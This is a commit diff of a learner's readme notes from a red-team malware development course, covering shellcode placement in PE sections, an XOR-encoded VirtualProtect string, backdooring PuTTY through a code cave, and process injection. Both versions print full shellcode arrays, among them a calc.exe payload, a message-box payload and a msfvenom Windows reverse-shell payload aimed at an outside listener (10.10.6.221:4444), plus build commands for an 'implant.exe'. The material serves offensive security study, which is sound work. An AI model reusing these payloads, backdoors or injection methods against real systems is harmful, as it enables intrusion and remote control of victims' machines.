sektor7_red_team_operator/readme.md, before:

Hasherzade - creates really interesting tools.

6 different section -

.text

.rdata

.data

.pdata

.rsrc

.reloc


dumpbin in windows also performs the same activity as the metadata

 headers - metadata
 section - content of PE

we can make dll through clang
`
//cl.exe /D_USRDLL /D_WINDLL stand_in_app.cpp /MT /link /DLL /OUT:implant.dll`

### places to put your payload

in order to put shellcode in text section we need to put it in someplace like `.text` section that is the main program.

to put it in data we need to tell the compiler that `.shellcode` is read only memory

to put in `.rsrc` section,  we need to use certain api calls to call the shellcoden 

### putting payload in  data section

our variable ended in the data section because we delared it as a global variable.

![](control_to_debugger.png)

looking at the address
38a000 addr of payload
7d0000 exec memory address

### putting into text section

you need to put your payload inside main itself.

addr of payload      : 0x006FFB8C
exec_mem addr        : 0x00740000

Hit me!

after changin it ot (voiid *)

addr of payload      : 0x0113FDE8
exec_mem addr        : 0x01160000

Address  Data       
00940001 90 90 CC C3
00B63019 90 90 CC C3


looking at all addresses we got

```cpp
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	printf("%-20s : 0x%-016p\n",  "addr of void * payload", (void *)payload);
	printf("%-20s : 0x%-016p\n", "payload & addr", &payload);
	printf("%-20s : 0x%-016p\n", "payload addr", payload);

	printf("%-20s : 0x%-016p\n", "exec_mem void * addr", (void *)exec_mem);
	printf("%-20s : 0x%-016p\n", "exec_mem  addr", exec_mem);
	printf("%-20s : 0x%-016p\n", "exec_mem &  addr", &exec_mem);

```
   
```
addr of void * payload : 0x009EF7F8
payload & addr       : 0x009EF7F8
payload addr         : 0x009EF7F8
exec_mem void * addr : 0x00D40000
exec_mem  addr       : 0x00D40000
exec_mem &  addr     : 0x009EF7F0

Hit me!
```

compile bat -

compiling
```
@ECHO OFF
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
```

resources section
``
#include "resources.h"

FAVICON_ICO RCDATA calc.ico

```

resources.h - `#define calc_ico 100`

create a calc.ico - calc.ico has execuatable code for meterpreter in calc.exe.

The shellcode ot spawn calc.exe - `msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py`

### video 15

```
//from https://packetstormsecurity.com/files/156478/Windows-x86-Null-Free-WinExec-Calc.exe-Shellcode.html

char shellcode[] =
"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"

```

In video 15 we are trying to write our own vutual protect function in order to make it work.

ciphertext for VirtualProtect - `{ 0x17, 0x2b, 0x31, 0x30, 0x30, 0x27, 0x2b, 0x18, 0x3b, 0x25, 0x3f, 0x29, 0x2e, 0x3a };`

### video 16

backdooring PE files - patching

methods -
 code cave, new section and extending section in code itself.

### video 17

fully done in 
backdooring putty -

attach the exe to the debugger and look in text section for empty spaces like 000

for 32 bit putty:

002D5CA | E8 9A020000              | call putty.2D5F3F                       |

code cave address : 0x62197D34

002D5F3 | 8B0D 74103200            | mov ecx,dword ptr ds:[321074]           | ecx:EntryPoint
002D5F4 | 56                       | push esi                                | esi:EntryPoint
002D5F4 | 57                       | push edi                                | edi:EntryPoint
002D5F4 | BF 4EE640BB              | mov edi,BB40E64E                        | edi:EntryPoint
002D5F4 | BE 0000FFFF              | mov esi,FFFF0000                        | esi:EntryPoint
002D5F5 | 3BCF                     | cmp ecx,edi                             | ecx:EntryPoint, edi:EntryPoint
002D5F5 | 74 04                    | je putty.2D5F59                         |
002D5F5 | 85CE                     | test esi,ecx                            | esi:EntryPoint, ecx:EntryPoint
002D5F5 | 75 26                    | jne putty.2D5F7F                        |

code to bring up calculator

`\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2\x52\xff\xd0`

call that brings up calculator - 62197DE | E8 87FFFFFF              | call comctl32.62197D7B                  |

it is not working th epatching is not happening properly for the executed program, even after saving patches calculator is not called.
need to try it in the ovf tommorrow.

### video 18

code injection

from our process we put the shellcode in some target process like explorer.exe 

you allocate memory and then execute shellcode.

### video 18a

why do we need to inject a process

1. because initial acccess would be short lived

2. we need redundant connections

3. change the context is essential

Classic methods for shellcode

1. shellcode injection

2. injection of a DLL from a disk

### video 19

code inject payload example

getting the shellcode to open messagebox - https://ivanitlearning.wordpress.com/2018/10/14/shellcoding-with-msfvenom/

```
└─$ msfvenom -p windows/messagebox ICON="WARNING" TEXT="Hello there" TITLE="General Kenobi:" -f c -a x86                 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 268 bytes
Final size of c file: 1150 bytes
unsigned char buf[] = 
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x62\x69\x3a\x58\x68\x4b\x65"
"\x6e\x6f\x68\x72\x61\x6c\x20\x68\x47\x65\x6e\x65\x31\xdb\x88"
"\x5c\x24\x0f\x89\xe3\x68\x65\x72\x65\x58\x68\x6f\x20\x74\x68"
"\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x0b\x89\xe1\x31\xd2"
"\x6a\x30\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
```

this is the shellcode to open reverse shell

```
┌──(misthios㉿kali)-[~]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.6.221 LPORT=4444 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x06\xdd\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

```

compile.dat used - `cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG stand_in.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64`

### process injection

able to get calc from nslookup

![](calc_from_ns_lookup.png)

# Things to learn and do

1. How to eliminate null characters from shellcode.
2. How to integrate all for complete evasion.

3. `process_injection_self_written.c` not working

Commit message:

sektor7: use 64 bit program with 64 bit code

sektor7_red_team_operator/readme.md, after:

Hasherzade - creates really interesting tools.

6 different section -

.text

.rdata

.data

.pdata

.rsrc

.reloc


dumpbin in windows also performs the same activity as the metadata

 headers - metadata
 section - content of PE

we can make dll through clang
`
//cl.exe /D_USRDLL /D_WINDLL stand_in_app.cpp /MT /link /DLL /OUT:implant.dll`

### places to put your payload

in order to put shellcode in text section we need to put it in someplace like `.text` section that is the main program.

to put it in data we need to tell the compiler that `.shellcode` is read only memory

to put in `.rsrc` section,  we need to use certain api calls to call the shellcoden 

### putting payload in  data section

our variable ended in the data section because we delared it as a global variable.

![](control_to_debugger.png)

looking at the address
38a000 addr of payload
7d0000 exec memory address

### putting into text section

you need to put your payload inside main itself.

addr of payload      : 0x006FFB8C
exec_mem addr        : 0x00740000

Hit me!

after changin it ot (voiid *)

addr of payload      : 0x0113FDE8
exec_mem addr        : 0x01160000

Address  Data       
00940001 90 90 CC C3
00B63019 90 90 CC C3


looking at all addresses we got

```cpp
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	printf("%-20s : 0x%-016p\n",  "addr of void * payload", (void *)payload);
	printf("%-20s : 0x%-016p\n", "payload & addr", &payload);
	printf("%-20s : 0x%-016p\n", "payload addr", payload);

	printf("%-20s : 0x%-016p\n", "exec_mem void * addr", (void *)exec_mem);
	printf("%-20s : 0x%-016p\n", "exec_mem  addr", exec_mem);
	printf("%-20s : 0x%-016p\n", "exec_mem &  addr", &exec_mem);

```
   
```
addr of void * payload : 0x009EF7F8
payload & addr       : 0x009EF7F8
payload addr         : 0x009EF7F8
exec_mem void * addr : 0x00D40000
exec_mem  addr       : 0x00D40000
exec_mem &  addr     : 0x009EF7F0

Hit me!
```

compile bat -

compiling
```
@ECHO OFF
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
```

resources section
``
#include "resources.h"

FAVICON_ICO RCDATA calc.ico

```

resources.h - `#define calc_ico 100`

create a calc.ico - calc.ico has execuatable code for meterpreter in calc.exe.

The shellcode ot spawn calc.exe - `msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py`

### video 15

```
//from https://packetstormsecurity.com/files/156478/Windows-x86-Null-Free-WinExec-Calc.exe-Shellcode.html

char shellcode[] =
"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"

```

In video 15 we are trying to write our own vutual protect function in order to make it work.

ciphertext for VirtualProtect - `{ 0x17, 0x2b, 0x31, 0x30, 0x30, 0x27, 0x2b, 0x18, 0x3b, 0x25, 0x3f, 0x29, 0x2e, 0x3a };`

### video 16

backdooring PE files - patching

methods -
 code cave, new section and extending section in code itself.

### video 17

fully done in 
backdooring putty -

attach the exe to the debugger and look in text section for empty spaces like 000

for 32 bit putty:

002D5CA | E8 9A020000              | call putty.2D5F3F                       |

code cave address : 0x62197D34

002D5F3 | 8B0D 74103200            | mov ecx,dword ptr ds:[321074]           | ecx:EntryPoint
002D5F4 | 56                       | push esi                                | esi:EntryPoint
002D5F4 | 57                       | push edi                                | edi:EntryPoint
002D5F4 | BF 4EE640BB              | mov edi,BB40E64E                        | edi:EntryPoint
002D5F4 | BE 0000FFFF              | mov esi,FFFF0000                        | esi:EntryPoint
002D5F5 | 3BCF                     | cmp ecx,edi                             | ecx:EntryPoint, edi:EntryPoint
002D5F5 | 74 04                    | je putty.2D5F59                         |
002D5F5 | 85CE                     | test esi,ecx                            | esi:EntryPoint, ecx:EntryPoint
002D5F5 | 75 26                    | jne putty.2D5F7F                        |

code to bring up calculator

`\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2\x52\xff\xd0`

call that brings up calculator - 62197DE | E8 87FFFFFF              | call comctl32.62197D7B                  |

it is not working th epatching is not happening properly for the executed program, even after saving patches calculator is not called.
need to try it in the ovf tommorrow.

### video 18

code injection

from our process we put the shellcode in some target process like explorer.exe 

you allocate memory and then execute shellcode.

### video 18a

why do we need to inject a process

1. because initial acccess would be short lived

2. we need redundant connections

3. change the context is essential

Classic methods for shellcode

1. shellcode injection

2. injection of a DLL from a disk

### video 19

code inject payload example

getting the shellcode to open messagebox - https://ivanitlearning.wordpress.com/2018/10/14/shellcoding-with-msfvenom/

```
└─$ msfvenom -p windows/messagebox ICON="WARNING" TEXT="Hello there" TITLE="General Kenobi:" -f c -a x86                 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 268 bytes
Final size of c file: 1150 bytes
unsigned char buf[] = 
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x62\x69\x3a\x58\x68\x4b\x65"
"\x6e\x6f\x68\x72\x61\x6c\x20\x68\x47\x65\x6e\x65\x31\xdb\x88"
"\x5c\x24\x0f\x89\xe3\x68\x65\x72\x65\x58\x68\x6f\x20\x74\x68"
"\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x0b\x89\xe1\x31\xd2"
"\x6a\x30\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
```

this is the shellcode to open reverse shell

```
┌──(misthios㉿kali)-[~]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.6.221 LPORT=4444 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x06\xdd\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

```

compile.dat used - `cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG stand_in.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64`

3. `process_injection_self_written.c` not working - the reason it was not working was because i was trying to inject a 64 bit notepad with a 64 bit comipler.


### process injection

able to get calc from nslookup

![](calc_from_ns_lookup.png)

# Things to learn and do

1. How to eliminate null characters from shellcode.
2. How to integrate all for complete evasion.
